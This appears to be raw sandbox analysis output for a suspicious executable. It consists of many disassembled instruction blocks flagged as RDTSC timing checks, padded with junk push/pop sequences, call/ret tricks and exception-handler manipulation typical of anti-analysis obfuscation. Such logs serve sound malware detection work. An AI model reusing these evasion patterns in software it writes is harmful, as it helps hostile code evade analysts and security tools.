Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13C29D5 second address: 13C2A37 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FB1C8D0EF74h 0x0000000b popad 0x0000000c push eax 0x0000000d pushad 0x0000000e jmp 00007FB1C8D0EF6Bh 0x00000013 jbe 00007FB1C8D0EF68h 0x00000019 push edx 0x0000001a pop edx 0x0000001b popad 0x0000001c nop 0x0000001d call 00007FB1C8D0EF6Eh 0x00000022 mov dword ptr [ebp+122D1C1Ch], ebx 0x00000028 pop edi 0x00000029 push 00000000h 0x0000002b cmc 0x0000002c mov di, si 0x0000002f push 00000000h 0x00000031 mov bx, 334Ah 0x00000035 xchg eax, esi 0x00000036 push eax 0x00000037 push edx 0x00000038 ja 00007FB1C8D0EF6Ch 0x0000003e jnl 00007FB1C8D0EF66h 0x00000044 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13C1A3D second address: 13C1A41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13BFA40 second address: 13BFA58 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB1C8D0EF74h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13C1A41 second address: 13C1AD3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007FB1C8B21D36h 0x00000009 jc 00007FB1C8B21D36h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 mov dword ptr [esp], eax 0x00000015 push 00000000h 0x00000017 push edx 0x00000018 call 00007FB1C8B21D38h 0x0000001d pop edx 0x0000001e mov dword ptr [esp+04h], edx 0x00000022 add dword ptr [esp+04h], 00000017h 0x0000002a inc edx 0x0000002b push edx 0x0000002c ret 0x0000002d pop edx 0x0000002e ret 0x0000002f mov bl, F0h 0x00000031 push dword ptr fs:[00000000h] 0x00000038 mov bx, si 0x0000003b mov dword ptr fs:[00000000h], esp 0x00000042 mov dword ptr [ebp+124561FBh], ebx 0x00000048 pushad 0x00000049 mov edx, 465C920Bh 0x0000004e and ebx, dword ptr [ebp+122D3034h] 0x00000054 popad 0x00000055 mov eax, dword ptr [ebp+122D03F9h] 0x0000005b jl 00007FB1C8B21D50h 0x00000061 pushad 0x00000062 call 00007FB1C8B21D41h 0x00000067 pop edx 0x00000068 xor dword ptr [ebp+1244BE2Eh], ecx 0x0000006e popad 0x0000006f push FFFFFFFFh 0x00000071 mov dword ptr [ebp+122D2497h], ebx 0x00000077 nop 0x00000078 pushad 0x00000079 push eax 0x0000007a push edx 0x0000007b js 00007FB1C8B21D36h 0x00000081 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13BFA58 second address: 13BFA5E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13C1AD3 second address: 13C1AFB instructions: 0x00000000 rdtsc 0x00000002 js 00007FB1C8B21D36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FB1C8B21D46h 0x0000000f popad 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push esi 0x00000014 push esi 0x00000015 pop esi 0x00000016 pop esi 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13BFA5E second address: 13BFA62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13C2C16 second address: 13C2CC1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB1C8B21D46h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a nop 0x0000000b pushad 0x0000000c sub dword ptr [ebp+12469CF7h], ebx 0x00000012 popad 0x00000013 xor ebx, dword ptr [ebp+1244BC14h] 0x00000019 push dword ptr fs:[00000000h] 0x00000020 mov edi, dword ptr [ebp+122D392Eh] 0x00000026 jnp 00007FB1C8B21D38h 0x0000002c mov bh, ECh 0x0000002e mov dword ptr fs:[00000000h], esp 0x00000035 push 00000000h 0x00000037 push edi 0x00000038 call 00007FB1C8B21D38h 0x0000003d pop edi 0x0000003e mov dword ptr [esp+04h], edi 0x00000042 add dword ptr [esp+04h], 0000001Dh 0x0000004a inc edi 0x0000004b push edi 0x0000004c ret 0x0000004d pop edi 0x0000004e ret 0x0000004f mov dword ptr [ebp+122D1C18h], ebx 0x00000055 mov eax, dword ptr [ebp+122D1051h] 0x0000005b push 00000000h 0x0000005d push ebp 0x0000005e call 00007FB1C8B21D38h 0x00000063 pop ebp 0x00000064 mov dword ptr [esp+04h], ebp 0x00000068 add dword ptr [esp+04h], 0000001Ch 0x00000070 inc ebp 0x00000071 push ebp 0x00000072 ret 0x00000073 pop ebp 0x00000074 ret 0x00000075 mov bl, dl 0x00000077 push FFFFFFFFh 0x00000079 sub edi, dword ptr [ebp+122D3956h] 0x0000007f push eax 0x00000080 push ecx 0x00000081 push eax 0x00000082 push edx 0x00000083 pushad 0x00000084 popad 0x00000085 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13C1AFB second address: 13C1B05 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FB1C8D0EF6Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13C5A81 second address: 13C5A94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 push eax 0x00000007 pushad 0x00000008 push ebx 0x00000009 ja 00007FB1C8B21D36h 0x0000000f pop ebx 0x00000010 push edi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13C6AC5 second address: 13C6ACC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13C4D14 second address: 13C4D18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13C79E5 second address: 13C7A0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 jmp 00007FB1C8D0EF6Fh 0x0000000c popad 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 jmp 00007FB1C8D0EF6Ch 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13C7A0E second address: 13C7A13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13C5D47 second address: 13C5D59 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB1C8D0EF6Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13C5D59 second address: 13C5D66 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13CA9FC second address: 13CAA1C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB1C8D0EF75h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13C9BC0 second address: 13C9BC6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13CAA1C second address: 13CAA21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13C9BC6 second address: 13C9C6F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jne 00007FB1C8B21D3Eh 0x0000000f nop 0x00000010 jp 00007FB1C8B21D3Ch 0x00000016 push dword ptr fs:[00000000h] 0x0000001d pushad 0x0000001e and eax, dword ptr [ebp+122D3A1Eh] 0x00000024 ja 00007FB1C8B21D38h 0x0000002a mov ch, EFh 0x0000002c popad 0x0000002d mov dword ptr fs:[00000000h], esp 0x00000034 mov ebx, dword ptr [ebp+122D3A82h] 0x0000003a xor dword ptr [ebp+122DB909h], esi 0x00000040 mov eax, dword ptr [ebp+122D01D9h] 0x00000046 push 00000000h 0x00000048 push ecx 0x00000049 call 00007FB1C8B21D38h 0x0000004e pop ecx 0x0000004f mov dword ptr [esp+04h], ecx 0x00000053 add dword ptr [esp+04h], 00000014h 0x0000005b inc ecx 0x0000005c push ecx 0x0000005d ret 0x0000005e pop ecx 0x0000005f ret 0x00000060 or dword ptr [ebp+12468A32h], eax 0x00000066 push FFFFFFFFh 0x00000068 push ecx 0x00000069 call 00007FB1C8B21D3Ch 0x0000006e mov edi, eax 0x00000070 pop edi 0x00000071 pop edi 0x00000072 nop 0x00000073 jmp 00007FB1C8B21D3Bh 0x00000078 push eax 0x00000079 push ecx 0x0000007a pushad 0x0000007b jmp 00007FB1C8B21D3Fh 0x00000080 push eax 0x00000081 push edx 0x00000082 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13CACAA second address: 13CACAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13CBB73 second address: 13CBB81 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13CDC0F second address: 13CDC2B instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FB1C8D0EF72h 0x00000008 js 00007FB1C8D0EF6Eh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13CBB81 second address: 13CBB9B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB1C8B21D46h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13CBB9B second address: 13CBC1C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 mov edi, dword ptr [ebp+122D246Bh] 0x0000000f push dword ptr fs:[00000000h] 0x00000016 mov ebx, dword ptr [ebp+122D3A7Eh] 0x0000001c mov bx, 9A1Fh 0x00000020 mov dword ptr fs:[00000000h], esp 0x00000027 push 00000000h 0x00000029 push ebx 0x0000002a call 00007FB1C8D0EF68h 0x0000002f pop ebx 0x00000030 mov dword ptr [esp+04h], ebx 0x00000034 add dword ptr [esp+04h], 0000001Ah 0x0000003c inc ebx 0x0000003d push ebx 0x0000003e ret 0x0000003f pop ebx 0x00000040 ret 0x00000041 mov eax, dword ptr [ebp+122D111Dh] 0x00000047 jc 00007FB1C8D0EF78h 0x0000004d jmp 00007FB1C8D0EF72h 0x00000052 sub dword ptr [ebp+122D2A37h], esi 0x00000058 push FFFFFFFFh 0x0000005a mov bx, 2730h 0x0000005e movzx ebx, bx 0x00000061 push eax 0x00000062 push eax 0x00000063 push edx 0x00000064 jc 00007FB1C8D0EF68h 0x0000006a push edx 0x0000006b pop edx 0x0000006c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13CE1ED second address: 13CE1F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13CE1F1 second address: 13CE293 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FB1C8D0EF66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ecx 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push edx 0x0000000f call 00007FB1C8D0EF68h 0x00000014 pop edx 0x00000015 mov dword ptr [esp+04h], edx 0x00000019 add dword ptr [esp+04h], 0000001Bh 0x00000021 inc edx 0x00000022 push edx 0x00000023 ret 0x00000024 pop edx 0x00000025 ret 0x00000026 mov dword ptr [ebp+122D17F6h], ecx 0x0000002c push 00000000h 0x0000002e push 00000000h 0x00000030 push ecx 0x00000031 call 00007FB1C8D0EF68h 0x00000036 pop ecx 0x00000037 mov dword ptr [esp+04h], ecx 0x0000003b add dword ptr [esp+04h], 00000017h 0x00000043 inc ecx 0x00000044 push ecx 0x00000045 ret 0x00000046 pop ecx 0x00000047 ret 0x00000048 sub dword ptr [ebp+122DB9A1h], edx 0x0000004e push 00000000h 0x00000050 push 00000000h 0x00000052 push ecx 0x00000053 call 00007FB1C8D0EF68h 0x00000058 pop ecx 0x00000059 mov dword ptr [esp+04h], ecx 0x0000005d add dword ptr [esp+04h], 00000018h 0x00000065 inc ecx 0x00000066 push ecx 0x00000067 ret 0x00000068 pop ecx 0x00000069 ret 0x0000006a jnl 00007FB1C8D0EF69h 0x00000070 movzx ebx, ax 0x00000073 push eax 0x00000074 push eax 0x00000075 push edx 0x00000076 jmp 00007FB1C8D0EF75h 0x0000007b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13D3031 second address: 13D3043 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB1C8B21D3Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13D3043 second address: 13D3047 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13D3047 second address: 13D3050 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13D3050 second address: 13D306C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jmp 00007FB1C8D0EF6Dh 0x0000000b push eax 0x0000000c pop eax 0x0000000d popad 0x0000000e popad 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13D306C second address: 13D308B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FB1C8B21D42h 0x0000000b push ecx 0x0000000c push edi 0x0000000d pop edi 0x0000000e pop ecx 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13D308B second address: 13D3091 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13D694D second address: 13D695E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB1C8B21D3Bh 0x00000009 push esi 0x0000000a pop esi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13D8D13 second address: 13D8D17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13DC863 second address: 13DC891 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 jmp 00007FB1C8B21D49h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FB1C8B21D3Ah 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13DC891 second address: 13DC8B6 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push esi 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c pushad 0x0000000d jmp 00007FB1C8D0EF70h 0x00000012 push eax 0x00000013 push edx 0x00000014 jnp 00007FB1C8D0EF66h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13DC8B6 second address: 13DC8C3 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [eax] 0x00000009 push esi 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 137A78F second address: 137A799 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FB1C8D0EF66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13E1DDE second address: 13E1DF5 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FB1C8B21D36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b push eax 0x0000000c pop eax 0x0000000d pop edi 0x0000000e pushad 0x0000000f jc 00007FB1C8B21D36h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13E229C second address: 13E22A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13E22A2 second address: 13E22A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13E2408 second address: 13E240E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13E240E second address: 13E2421 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FB1C8B21D3Dh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13E8278 second address: 13E827E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13E827E second address: 13E8298 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jnc 00007FB1C8B21D42h 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13E72E8 second address: 13E72EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13E72EE second address: 13E72F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13E754A second address: 13E756A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB1C8D0EF6Ah 0x00000007 jmp 00007FB1C8D0EF72h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13E6CE4 second address: 13E6CE9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13E7C5F second address: 13E7C70 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FB1C8D0EF6Ah 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13E7C70 second address: 13E7C76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13E7F86 second address: 13E7F8B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13ED394 second address: 13ED3A4 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FB1C8B21D3Ah 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13ED3A4 second address: 13ED3C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007FB1C8D0EF6Eh 0x00000012 pop ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13ED3C4 second address: 13ED3CA instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13ED3CA second address: 13ED3CF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13EC1CD second address: 13EC1D4 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13EC1D4 second address: 13EC1DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13B2FE5 second address: 13B2FEC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13B2FEC second address: 13B3008 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jnl 00007FB1C8D0EF7Ah 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FB1C8D0EF6Ch 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13B30EF second address: 13B3109 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FB1C8B21D3Ch 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13B3109 second address: 13B3113 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FB1C8D0EF66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13B3113 second address: 13B3161 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FB1C8B21D3Ch 0x00000008 je 00007FB1C8B21D36h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov eax, dword ptr [eax] 0x00000012 jmp 00007FB1C8B21D44h 0x00000017 mov dword ptr [esp+04h], eax 0x0000001b js 00007FB1C8B21D3Ah 0x00000021 push edx 0x00000022 pushad 0x00000023 popad 0x00000024 pop edx 0x00000025 pop eax 0x00000026 sbb dx, C4BBh 0x0000002b call 00007FB1C8B21D39h 0x00000030 push eax 0x00000031 push edx 0x00000032 pushad 0x00000033 je 00007FB1C8B21D36h 0x00000039 push eax 0x0000003a push edx 0x0000003b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13B3161 second address: 13B3166 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13B3166 second address: 13B318B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB1C8B21D48h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push edx 0x0000000e pop edx 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13B318B second address: 13B31B2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB1C8D0EF71h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d push eax 0x0000000e push edx 0x0000000f jp 00007FB1C8D0EF6Ch 0x00000015 jnp 00007FB1C8D0EF66h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13B31B2 second address: 13B31CE instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FB1C8B21D38h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [eax] 0x0000000e push eax 0x0000000f push edx 0x00000010 jg 00007FB1C8B21D3Ch 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13B3336 second address: 13B333B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13B347B second address: 13B347F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13B35F3 second address: 13B360D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b jmp 00007FB1C8D0EF6Eh 0x00000010 pop eax 0x00000011 rdtsc
